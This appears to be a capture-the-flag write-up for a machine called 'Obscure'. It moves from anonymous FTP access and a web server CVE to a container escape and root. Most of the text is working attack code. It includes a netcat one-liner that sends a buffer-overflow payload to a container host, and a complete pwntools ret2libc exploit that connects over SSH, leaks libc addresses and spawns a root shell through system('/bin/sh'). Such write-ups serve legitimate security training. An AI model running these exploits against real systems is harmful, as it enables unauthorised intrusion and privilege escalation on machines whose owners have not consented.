Obscure Discussion [WRITE-UP]

Let’s talk about Obscure.

1. Connect to the FTP server as anonymous

Retrieve the password from the FTP server.

2. Log in to the webserver

Use the password to log in to the webserver. You also need to figure out the user's email address.

3. Exploit the webserver to get a shell

CVE-2017-10803 is a vulnerability in the webserver. Exploit it to get a shell.

4. Exploit the binary to escape from the container

Use this one-liner to get a shell on the host machine.

python -c 'print(b"A"*136 + b"\x47\x06\x40\x00")' > payload && cat payload - |  nc 172.17.0.1 4444

5. Get root

Finally, use the exploit below to perform a ret2libc attack remotely and get root. Copy exploit_me and /lib/x86_64-linux-gnu/libc.so.6 from the target to your machine (the script resolves symbols, gadgets and libc offsets from these local copies) and run the exploit.

from pwn import ELF, ROP, remote, log, p64, u64 , process, ssh

# --- Connection settings (as given in the write-up; HOST is redacted) ---
user = "zeeshan"
keyfile= "id_rsa"   # SSH private key used for the session below
port = 22
HOST = "10.10.xxx.xxx"

# SSH session; the target binary is started on the remote side via s.process() below
s = ssh(host=HOST, user=user, keyfile=keyfile, port=port)

LOCAL_BIN = "./exploit_me"    # local copy of the binary, used only for symbol/gadget lookup
LIBC = ELF("./libc.so.6")     # local copy of the target's libc (see step 5 above)
P = s.process("/exploit_me")  # remote instance that actually receives the payloads
ELF_LOADED = ELF(LOCAL_BIN)
# NOTE(review): ENV is not referenced anywhere else in this listing.
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
ROP_LOADED = ROP(ELF_LOADED)
OFFSET = b"A"*40  # padding placed in front of every ROP chain (see generate_payload_aligned)

libc_func = "puts"  # the libc function whose runtime address is leaked first
PUTS_PLT = ELF_LOADED.symbols["puts"]  # puts as resolved from the binary's own symbol table

MAIN_PLT = ELF_LOADED.symbols['main']  # chain 1 returns here so a second payload can be sent
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0]  # sets the single argument register
RET = (ROP_LOADED.find_gadget(['ret']))[0]  # lone ret, used only to fix 16-byte stack alignment

log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET))

def generate_payload_aligned(rop):
    """Prefix *rop* with OFFSET, inserting a lone ``ret`` when that makes the length a multiple of 16.

    Returns the first variant that is 16-byte aligned. If neither variant is
    aligned, a warning is logged and the plain ``OFFSET + rop`` variant is
    returned unchanged.
    """
    plain = OFFSET + rop
    if len(plain) % 16 == 0:
        return plain

    # One extra ret shifts the chain by 8 bytes without changing what it does.
    shifted = OFFSET + p64(RET) + rop
    if len(shifted) % 16 == 0:
        log.info("Payload aligned successfully")
        return shifted

    log.warning(f"I couldn't align the payload! Len: {len(plain)}")
    return plain


def get_addr(libc_func):
    """Leak the runtime address of *libc_func* and record the libc base in LIBC.address.

    Sends a first ROP chain that calls puts() on the GOT entry of *libc_func*
    and then returns into main, so the process stays alive for a second payload.

    Side effects: consumes output from the global process ``P`` and mutates the
    global ``LIBC``.
    Returns the leaked address as a hex string.
    """
    FUNC_GOT = ELF_LOADED.got[libc_func]
    log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
    # puts(FUNC_GOT) prints the pointer stored in the GOT; MAIN_PLT at the end restarts main.
    rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
    rop1 = generate_payload_aligned(rop1)
    P.recvuntil(b"!")  # wait for the program's prompt (expected to end with '!')
    P.sendline(rop1)
    P.recvline()  # one line is skipped; the leak is expected on the following line
    recieved = P.recvline().strip()
    log.critical(f"Recieved: {recieved}")
    log.info(f"Recieved: {recieved}")
    log.info(f"Len rop1: {len(rop1)}")
    # Zero-pad the leaked bytes back to 8 so u64 can decode them.
    leak = u64(recieved.ljust(8, b"\x00"))
    log.info(f"Leaked LIBC address,  {libc_func}: {hex(leak)}")
    
    if LIBC:
        # Base = leaked runtime address minus the symbol's offset inside the local libc copy.
        LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
        print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
        log.info("LIBC base @ %s" % hex(LIBC.address))
    else:
        # Fallback when no libc copy is loaded: hand control to the operator instead.
        print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
        P.interactive()
    
    return hex(leak)

get_addr(libc_func) # Leak the puts address in memory to obtain the LIBC base

# Stage 2: LIBC.address is now set, so these resolve to runtime addresses.
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"]

log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT))

# system("/bin/sh"); EXIT is resolved above but intentionally left off the chain (commented out).
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2)
    

print(P.clean())  # drain whatever the restarted main has printed so far
P.sendline(rop2)

P.interactive() #Interact with your shell :)